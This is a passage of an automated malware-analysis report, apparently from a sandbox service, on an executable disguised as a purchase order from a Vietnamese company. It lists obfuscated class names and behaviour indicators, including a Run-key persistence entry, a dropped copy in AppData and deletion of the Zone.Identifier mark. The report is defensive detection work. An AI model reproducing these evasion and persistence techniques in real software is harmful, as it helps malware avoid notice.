                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, GegNK9MHS8xGZZ61Gq.cs | High entropy of concatenated method names: 'kWGuguBDgY', 'huhuVNamJx', 'XOrusphPae', 'w6hua4AgZ5', 'N77udRjM1D', 'eMFuh8Z9fX', 'nPtuWgXHxv', 'd9yu4h9gyP', 'NjeuCmVbDu', 'fI6uFlaZrv'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, HlWFR4vQIClmUuPwY7.cs | High entropy of concatenated method names: 'nQgu3YJbAG', 'ntOuTAOTC4', 'Ak3uxgwSAS', 'A1Ou2BY03v', 'bRAuZRAR74', 'CyJu5eqYS6', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, h3P7Jmyj3XGBVnMunY.cs | High entropy of concatenated method names: 'igxseC1owB', 'WAXsAy6MTE', 'soEsQkVl8N', 'wglsy1glLR', 'qras8mmijv', 'SwwsbOIPRp', 'cNNs0CBVSE', 'zBnsuJb09q', 'lWNspmlQoL', 'okXsl8Eq3g'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, DYw0y6Y5vgvWOsT0qF.cs | High entropy of concatenated method names: 'tw2pRx2WQc', 'L8ep9MhVA7', 'erOpONh5C8', 'VoypgHUjIb', 'lGnpVxUjxV', 'qOopaSbVc4', 'gP1pdNgrZt', 'uUPuN7DRJD', 'hWDuMa22df', 'Bk7uvlnI8M'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, WVm6LK3lT2Kovi1yt2.cs | High entropy of concatenated method names: 'dcSdwbch6Q', 'MDKdVqYZNg', 'B6Mda156LL', 'DrVdhNfUhA', 'zLIdWkcrNR', 'cDNaEV4frQ', 'Em8acfCQuE', 'CQsaNx0NW9', 'n82aMKslpq', 'z0davmHWwt'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, NLLDLSGhLjNiFkvCP0.cs | High entropy of concatenated method names: 'ohim4SiNf', 'yDfeQDXi5', 'LRbAkQhbT', 'TjUreekdi', 'YKWyi1IIo', 'VfEqMj2QX', 'OSsHD3nslixDjt4Okx', 'oqgl2u5u2Q8HHcf1gL', 'sseuH24sx', 'DZHlU0Iw4'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, tDsfXfqDOSPinCLHbV.cs | High entropy of concatenated method names: 'drHa68Lcip', 'K9Uar3Cdav', 'jFesxwAMSk', 'nf5s2sLWmo', 'eBas5DdtGn', 'L6HsLVFUHS', 'qRosDHpNqN', 'DOqstLRrQA', 'uX0sHZAHgR', 'nWUskNv4uR'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, crOaocRUBdtAijCEKeb.cs | High entropy of concatenated method names: 'QLQpo3LPbe', 'zFMpJta6cw', 'MrJpm997QA', 'pr6peq8ouu', 'INIp6suju5', 'WEQpAoXnhG', 'as0prjAck0', 'Fi8pQwkSrf', 'YPApyiIRx5', 'f61pqpOr6O'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, qgQCdRR9ohCEh5iiW3H.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YwalZYxXVx', 'UODl1fLEsh', 'gPkljwfuZx', 'YSTln2QoF6', 'bQOlEZuja2', 'tlAlcaX1AU', 'I9vlNl4Zfx'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, TDUwymQgqk3Z3KoOJH.cs | High entropy of concatenated method names: 'vB6VZSDOtq', 'q2HV1bC4mb', 'v6qVjw1814', 'gMpVnxu4SV', 'Wf3VEYsm21', 'DH6Vc6pHOL', 'TcOVNJ01Jt', 'CCMVM8f4yS', 'Ee0Vvf0TSZ', 'GlnVYMLPcq'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, Ce2Xf9cjqybYAM3F2w.cs | High entropy of concatenated method names: 'OjS0MRIe08', 'ttH0YsScod', 'aqiuUA1i5l', 'YFQuRkh1l5', 'uHn0PU2yyA', 'fo907Zl2Ch', 'uQO0IVvKe2', 'yIK0Zytajp', 'E2C01vicDf', 'jDF0je48LY'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, leE21PHPPCCd9mfVUy.cs | High entropy of concatenated method names: 'pEthoifBFx', 'sgXhJlw68X', 'zT5hmpto2m', 'pCHheEorQP', 'yoKh6snU5M', 'pTYhAZPDUN', 'TRehrgVr8U', 'HRVhQRickV', 'X7Khyey2lT', 'RymhqLIjqC'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, aVADjOVDuEeZsiv9gr.cs | High entropy of concatenated method names: 'Dispose', 'T0cRvXBjHO', 'tE2GTBWM8r', 'SnokkHLy9R', 'T3eRYgNK9H', 'o8xRzGZZ61', 'ProcessDialogKey', 'cqxGUlWFR4', 'DICGRlmUuP', 'eY7GGQYw0y'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, YUIl37IKJYjF8xf27m.cs | High entropy of concatenated method names: 'PrHSQ58NC9', 'sLbSyDDd8p', 'E40S3v1ljY', 'yUYST3SQQj', 'TdwS2EZxKB', 'SfgS5t8InR', 'QgBSDX1mmL', 'NBISt5RnnG', 'JOBSkfLgMj', 'MJOSPv6wpZ'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, mxKMTujwPb7MXUpb3w.cs | High entropy of concatenated method names: 'ToString', 'fKFbPyGtta', 'h7RbTh78XW', 'LyvbxMaHEJ', 'iRgb2jIQiw', 'RN0b5yw0vo', 'FgQbLyBR0F', 'vfpbDwhD2h', 'QrpbtrhXIX', 'Gx4bHY13n0'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, yF83lkDx7U66ctmbMp.cs | High entropy of concatenated method names: 'cU5hgAWSSD', 'b0qhs4Pw9C', 'RdHhdxx3f9', 'KhadYs86ur', 'cQBdzACA4A', 'ufghUHkIDX', 'u6QhRc3o2T', 'uSXhGaEWil', 'm83h93JvPN', 'TSUhO0rFwV'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, WTWIs8ORlK2dCEydd1.cs | High entropy of concatenated method names: 'LPnRhDUwym', 'fqkRW3Z3Ko', 'zj3RCXGBVn', 'XunRFYXDsf', 'mLHR8bVNVm', 'BLKRblT2Ko', 'XmvMrBugM0j0x7ytfa', 'UGTTKZRRCXOxxEfvvN', 'wX5RRU8Vug', 'YjaR97xsuS'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, zntx6TZ7Lbd4cPomW6.cs | High entropy of concatenated method names: 'ww68kQl4sH', 'hHR87JCUHr', 'RZs8ZSxi7D', 'FOE81BNJ40', 'taH8TXE3ZA', 'JtC8xUFp58', 'n9Q82stkSW', 'lcK85g9nWD', 'OR28LiVxJj', 'ONI8DL16Nc'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.cs | High entropy of concatenated method names: 'dtl9wSHLsw', 'Msc9gKMPU9', 'UyM9VPDDrp', 'ubc9sh973I', 'Cok9aj6bHX', 'sP19dPsj76', 'IEK9hniY3a', 'T1U9WDAWg1', 'UxN94iuI4B', 'C0t9C6dfM3'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, Kq767ssRxj1nqny8Z0.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'S64Gv2f46X', 'NH6GYDRc6V', 'gBZGz4ylCp', 'Aq49Uon7YW', 'cJf9RE5Ufe', 'XEu9GaH0Ck', 'Cbp99IyNrh', 'dKNwTsGoQJkwn9ixCIT'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, GegNK9MHS8xGZZ61Gq.cs | High entropy of concatenated method names: 'kWGuguBDgY', 'huhuVNamJx', 'XOrusphPae', 'w6hua4AgZ5', 'N77udRjM1D', 'eMFuh8Z9fX', 'nPtuWgXHxv', 'd9yu4h9gyP', 'NjeuCmVbDu', 'fI6uFlaZrv'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, HlWFR4vQIClmUuPwY7.cs | High entropy of concatenated method names: 'nQgu3YJbAG', 'ntOuTAOTC4', 'Ak3uxgwSAS', 'A1Ou2BY03v', 'bRAuZRAR74', 'CyJu5eqYS6', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, h3P7Jmyj3XGBVnMunY.cs | High entropy of concatenated method names: 'igxseC1owB', 'WAXsAy6MTE', 'soEsQkVl8N', 'wglsy1glLR', 'qras8mmijv', 'SwwsbOIPRp', 'cNNs0CBVSE', 'zBnsuJb09q', 'lWNspmlQoL', 'okXsl8Eq3g'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, DYw0y6Y5vgvWOsT0qF.cs | High entropy of concatenated method names: 'tw2pRx2WQc', 'L8ep9MhVA7', 'erOpONh5C8', 'VoypgHUjIb', 'lGnpVxUjxV', 'qOopaSbVc4', 'gP1pdNgrZt', 'uUPuN7DRJD', 'hWDuMa22df', 'Bk7uvlnI8M'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, WVm6LK3lT2Kovi1yt2.csHigh entropy of concatenated method names: 'dcSdwbch6Q', 'MDKdVqYZNg', 'B6Mda156LL', 'DrVdhNfUhA', 'zLIdWkcrNR', 'cDNaEV4frQ', 'Em8acfCQuE', 'CQsaNx0NW9', 'n82aMKslpq', 'z0davmHWwt'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, NLLDLSGhLjNiFkvCP0.csHigh entropy of concatenated method names: 'ohim4SiNf', 'yDfeQDXi5', 'LRbAkQhbT', 'TjUreekdi', 'YKWyi1IIo', 'VfEqMj2QX', 'OSsHD3nslixDjt4Okx', 'oqgl2u5u2Q8HHcf1gL', 'sseuH24sx', 'DZHlU0Iw4'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, tDsfXfqDOSPinCLHbV.csHigh entropy of concatenated method names: 'drHa68Lcip', 'K9Uar3Cdav', 'jFesxwAMSk', 'nf5s2sLWmo', 'eBas5DdtGn', 'L6HsLVFUHS', 'qRosDHpNqN', 'DOqstLRrQA', 'uX0sHZAHgR', 'nWUskNv4uR'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, crOaocRUBdtAijCEKeb.csHigh entropy of concatenated method names: 'QLQpo3LPbe', 'zFMpJta6cw', 'MrJpm997QA', 'pr6peq8ouu', 'INIp6suju5', 'WEQpAoXnhG', 'as0prjAck0', 'Fi8pQwkSrf', 'YPApyiIRx5', 'f61pqpOr6O'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, qgQCdRR9ohCEh5iiW3H.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YwalZYxXVx', 'UODl1fLEsh', 'gPkljwfuZx', 'YSTln2QoF6', 'bQOlEZuja2', 'tlAlcaX1AU', 'I9vlNl4Zfx'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, TDUwymQgqk3Z3KoOJH.csHigh entropy of concatenated method names: 'vB6VZSDOtq', 'q2HV1bC4mb', 'v6qVjw1814', 'gMpVnxu4SV', 'Wf3VEYsm21', 'DH6Vc6pHOL', 'TcOVNJ01Jt', 'CCMVM8f4yS', 'Ee0Vvf0TSZ', 'GlnVYMLPcq'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, JwlrlmCCKvmG8rWaC9.csHigh entropy of concatenated method names: 'sBWW1o69QP', 'RgtTUJcyZL', 'wHRL3ZoRRm', 'qx3LWApERP', 'Eo0LL2b9ec', 'SSpLi0YFJu', 'f0gY5uTkfS8Ax', 'DIXDrUpg3', 'mwmTMKcOE', 'GXuog4qOP'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.raw.unpack, JwlrlmCCKvmG8rWaC9.csHigh entropy of concatenated method names: 'sBWW1o69QP', 'RgtTUJcyZL', 'wHRL3ZoRRm', 'qx3LWApERP', 'Eo0LL2b9ec', 'SSpLi0YFJu', 'f0gY5uTkfS8Ax', 'DIXDrUpg3', 'mwmTMKcOE', 'GXuog4qOP'
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe File created: \pr 2500006515 #u2116 972 #u043e#u0442 eta 24 hidmaksan vietnam ind co.,ltd 2024.exe
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe File created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwT

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe File opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
